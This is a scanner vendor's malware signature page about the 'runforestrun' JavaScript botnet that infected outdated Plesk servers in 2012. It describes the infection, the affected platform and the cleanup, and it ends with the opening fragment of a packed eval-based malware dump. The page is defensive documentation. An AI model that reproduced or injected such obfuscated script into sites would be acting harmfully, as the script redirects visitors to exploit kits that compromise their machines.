SiteCheck Signatures

  1. Home
  2. SiteCheck Signatures
  3. malware.runforest


Description: Our scanners identified a packed (encoded) javascript block related to the "runforestrun" malware botnet that has been compromising Plesk-powered servers.

This is a very common malware infecting thousands of sites (Jul 2012). Some of the domains being used:

.. more random domains ..

Those links lead to multiple exploit kits affecting desktop (Windows) users. Additional details here:

Affecting: Sites with Plesk outdated.

Clean up: Malware is hidden at the javascript files.

Malware dump:

eval (function(p,a,c, k,e,r){e=function(c){return(c<a?"':e(parseInt(c/a)))+((c=c%a)>